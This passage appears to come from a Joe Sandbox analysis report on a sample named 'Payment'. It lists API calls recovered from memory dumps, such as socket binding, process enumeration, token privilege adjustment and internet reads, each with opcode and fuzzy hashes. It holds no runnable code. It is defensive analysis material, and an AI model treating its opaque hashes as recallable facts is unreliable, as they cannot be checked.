                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ColorProc$LongWindow
                                                          • String ID:
                                                          • API String ID: 3744519093-0
                                                          • Opcode ID: 54f08d848818c784a86a853b97690161845a8258a0778440efc7236e12f2a7a7
                                                          • Instruction ID: 01202ad7f57ef264c6ebafe7c07d5c7c42ee8f5d65d8a14dcb9525a281d55c31
                                                          • Opcode Fuzzy Hash: 54f08d848818c784a86a853b97690161845a8258a0778440efc7236e12f2a7a7
                                                          • Instruction Fuzzy Hash: 84A12871105554BEE638AB295C98E7F3AEDDB42382F14019BF803D63E5DE24CD01D2B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B480A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B480CB
                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B46AB1
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B46ADA
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00B46B13
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B46B20
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00B46B34
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 99427753-0
                                                          • Opcode ID: 03ff43c18e5f16382b646bb2a4926ef6f7813aab8fd5dc50016f82304d8a7626
                                                          • Instruction ID: 71f66479e091c5434f399d62d7ce33d501ca8134adc49503b9328bb26647cc28
                                                          • Opcode Fuzzy Hash: 03ff43c18e5f16382b646bb2a4926ef6f7813aab8fd5dc50016f82304d8a7626
                                                          • Instruction Fuzzy Hash: FB41B675700610AFEB10BF24DD86F7E77E9EB49710F048099F91AAB3D2DA749E018B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: 85260728880436aa8db1e36794b501adbcb88b93b6c73852d7cf2b9820afe328
                                                          • Instruction ID: bca71d2ba2df8e2216e746f44dcd28e0ba7fc4200c4466a1054f5c2e02aa73d5
                                                          • Opcode Fuzzy Hash: 85260728880436aa8db1e36794b501adbcb88b93b6c73852d7cf2b9820afe328
                                                          • Instruction Fuzzy Hash: D011B232700A616FE7212F26DC64B6FB7D8EF54763B8140A9F806D7251CB70D902CAA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00B11D88,?), ref: 00B4C312
                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B4C324
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                          • API String ID: 2574300362-1816364905
                                                          • Opcode ID: 8ac47df87ba7541b5026b596c25ebf2664c824a1a3b858cee94d5c2b96c0256f
                                                          • Instruction ID: 2dfadf961a00ec5d7d77a829c58ef67a309f563bcea16627163a107bbe557297
                                                          • Opcode Fuzzy Hash: 8ac47df87ba7541b5026b596c25ebf2664c824a1a3b858cee94d5c2b96c0256f
                                                          • Instruction Fuzzy Hash: D3E0EC74601713CFDB605F25D804F56BAD4EF08B56B8084F9E895D72A0EB70E840DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: __itow__swprintf
                                                          • String ID:
                                                          • API String ID: 674341424-0
                                                          • Opcode ID: c5e45754e7f5e4525e96a9971f01e206c8b33f67377277e1ce996c61e99369ef
                                                          • Instruction ID: 0f67ab9aff8c1e7785251a23645bde8d798a986c2bcd9654336ba7cc1a08733d
                                                          • Opcode Fuzzy Hash: c5e45754e7f5e4525e96a9971f01e206c8b33f67377277e1ce996c61e99369ef
                                                          • Instruction Fuzzy Hash: FD22AA726083419FCB24DF25C995BABB7F4AF84300F10492DF99A97391DB70EA45CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00B4F151
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00B4F15F
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00B4F21F
                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00B4F22E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                          • String ID:
                                                          • API String ID: 2576544623-0
                                                          • Opcode ID: 4de869343e7f8959d527a3d5e28b5122e967c32aa1efd87e494c84f682da2f89
                                                          • Instruction ID: 34c42d5de2d12b82897cf442f494e5e7f24ca96d552a2c29bf205ea1199f0d66
                                                          • Opcode Fuzzy Hash: 4de869343e7f8959d527a3d5e28b5122e967c32aa1efd87e494c84f682da2f89
                                                          • Instruction Fuzzy Hash: 23515B71504711AFD310EF24DC85A6BBBE8FF98750F10496EF496972A1EB70EA04CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B340D1
                                                          • _memset.LIBCMT ref: 00B340F2
                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B34144
                                                          • CloseHandle.KERNEL32(00000000), ref: 00B3414D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                          • String ID:
                                                          • API String ID: 1157408455-0
                                                          • Opcode ID: e432114535e921f755c5e8cc988eb771c7792f13d33666e3bdcb2d5be7923b7d
                                                          • Instruction ID: d91d5bee99499d247e146041ba970a9f32ff1bd79148198eae94736c5855832e
                                                          • Opcode Fuzzy Hash: e432114535e921f755c5e8cc988eb771c7792f13d33666e3bdcb2d5be7923b7d
                                                          • Instruction Fuzzy Hash: 1B11EB759013287AE7305BA59C4DFBBBBBCEF44760F1041D6F908E7180D6744E808BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B2EB19
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: ($|
                                                          • API String ID: 1659193697-1631851259
                                                          • Opcode ID: 66a0386200fbf597d6d64407d0725a899ed225890e4cc5762d36d49ff16fad6c
                                                          • Instruction ID: c4b0820ce4487d3aa4c771da823ddf8cb9df9ad536798aeebe809ebe3ba4166b
                                                          • Opcode Fuzzy Hash: 66a0386200fbf597d6d64407d0725a899ed225890e4cc5762d36d49ff16fad6c
                                                          • Instruction Fuzzy Hash: F4323775A007159FDB28CF69D481A6AB7F0FF48310B15C5AEE8AADB3A1D770E941CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00B426D5
                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B4270C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                          • String ID:
                                                          • API String ID: 599397726-0
                                                          • Opcode ID: 38dd84647be38b4d7c9cf3b01c18e54c28b5f1c9618cfb5101ee3c275d16faa7
                                                          • Instruction ID: 5c4009b7aefe7b438f6c742e3ac3d2388c357e66c08306db34d9de15115e8a6f
                                                          • Opcode Fuzzy Hash: 38dd84647be38b4d7c9cf3b01c18e54c28b5f1c9618cfb5101ee3c275d16faa7
                                                          • Instruction Fuzzy Hash: B341C371900209BFEB209B94DDC5EBBB7FCEB40764F5040EAFA01A6141EA719F41B664
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00B3B5AE
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B3B608
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B3B655
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1682464887-0
                                                          • Opcode ID: ac5d00fac418d0fae54c2f4ac2cc17e2989cbb399f510bc69b646f4f48c5ccf6
                                                          • Instruction ID: 61d0e0059701654de65b1d87a49c1629f066aecbc68dfee0ecd9a8bec1a5b76b
                                                          • Opcode Fuzzy Hash: ac5d00fac418d0fae54c2f4ac2cc17e2989cbb399f510bc69b646f4f48c5ccf6
                                                          • Instruction Fuzzy Hash: B8216235A00618EFCB00EF65D885EAEFBF8FF48310F1480AAE945AB361DB319915CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AF0FF6: std::exception::exception.LIBCMT ref: 00AF102C
                                                            • Part of subcall function 00AF0FF6: __CxxThrowException@8.LIBCMT ref: 00AF1041
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B28D0D
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B28D3A
                                                          • GetLastError.KERNEL32 ref: 00B28D47
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1922334811-0
                                                          • Opcode ID: 664ec74687ab90104b42fdb8f12485e1e395e9e56c11a378cdb54c36b5910e06
                                                          • Instruction ID: 5836743c69933348e19364a23b36644cc3581ba62f8a95a41f56884f4bbd96b4
                                                          • Opcode Fuzzy Hash: 664ec74687ab90104b42fdb8f12485e1e395e9e56c11a378cdb54c36b5910e06
                                                          • Instruction Fuzzy Hash: 3811BFB1414309AFE728AF64EC85D7BB7FCEB04711B24856EF44A87281EF30AC408B20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B34C2C
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B34C43
                                                          • FreeSid.ADVAPI32(?), ref: 00B34C53
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: 9d7adb7ca34adc2e167d24487268124e1d560a984aea42eabf30b647cc3a56ba
                                                          • Instruction ID: c73b297fea5acbac903e23d0a79ec47a2fdf86b3c9be21ae4ecd7c9e3d842d47
                                                          • Opcode Fuzzy Hash: 9d7adb7ca34adc2e167d24487268124e1d560a984aea42eabf30b647cc3a56ba
                                                          • Instruction Fuzzy Hash: C2F03775A11309BBDB04DFE09C89ABEBBB8EB08211F5444A9A902E2181E6706A048B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9856c896366ea244ecfda5f8789a3cea690d31e3177acf52ac989d7df3b8d845
                                                          • Instruction ID: fb817854b4c81d0769d16902decf4c13d910e6863946b80e7389cb6327defec4
                                                          • Opcode Fuzzy Hash: 9856c896366ea244ecfda5f8789a3cea690d31e3177acf52ac989d7df3b8d845
                                                          • Instruction Fuzzy Hash: 01228A74A0021ADFDB24EF54C580ABEB7F0FF18310F1481AAE956AF351E735A985CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00B3C966
                                                          • FindClose.KERNEL32(00000000), ref: 00B3C996
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 2935f2f592161bee8759394e3d8a900e4783705f488981abebd7e1f6529ae42a
                                                          • Instruction ID: a0c18c217b161395fb4a15ff51f4e96e7b3dc468dc48a335e1b7cd806824f895
                                                          • Opcode Fuzzy Hash: 2935f2f592161bee8759394e3d8a900e4783705f488981abebd7e1f6529ae42a
                                                          • Instruction Fuzzy Hash: 0B115E726106109FD710EF29D845A2AF7E9FF85325F11865EF9AAD73A1DB30AC01CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B4977D,?,00B5FB84,?), ref: 00B3A302
                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B4977D,?,00B5FB84,?), ref: 00B3A314
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: 2a48577a5b4d5179c842060fb8802ab2d419cd6d1970554288ac8d3126940fba
                                                          • Instruction ID: 1210a1c82bf33f4491e4397d5516c0556d303034ecb09b7656190067547b3234
                                                          • Opcode Fuzzy Hash: 2a48577a5b4d5179c842060fb8802ab2d419cd6d1970554288ac8d3126940fba
                                                          • Instruction Fuzzy Hash: 6CF0823554532DABEB20AFA4CC48FEA77ADFF08761F1081A6B909D7181DA309940CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B28851), ref: 00B28728
                                                          • CloseHandle.KERNEL32(?,?,00B28851), ref: 00B2873A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          • Opcode ID: 2045dd346f5264ee241374150b11f0dc4b4500aa5bfee22e022b3dd31d41e530
                                                          • Instruction ID: 4aa10d45f4c79a40aa85114c69a571bb841392cf0f5bcc81e1666689bf558d00
                                                          • Opcode Fuzzy Hash: 2045dd346f5264ee241374150b11f0dc4b4500aa5bfee22e022b3dd31d41e530
                                                          • Instruction Fuzzy Hash: D9E0B676011611EEEB252B60ED09E77BBE9EB043517248879B59681470DF62AC90DB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AF8F97,?,?,?,00000001), ref: 00AFA39A
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00AFA3A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: bcb4e79cbe0ab646765808ed229d0736e4849658230f2b775465658b6f618c8d
                                                          • Instruction ID: 273d3d48fe7a559b01c781d2ae6c3ed9746ebc0c03c676ff1b8393e95bfea56b
                                                          • Opcode Fuzzy Hash: bcb4e79cbe0ab646765808ed229d0736e4849658230f2b775465658b6f618c8d
                                                          • Instruction Fuzzy Hash: 40B0923105430AABEA002F91ED09BA9BF68EB44AA3F4040A0F60D86070CF6254508E99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cdc1e24a3fc52ccae3d5e7f64f327079c6c2b4dc6e6ec15e52e03e72e2c30be9
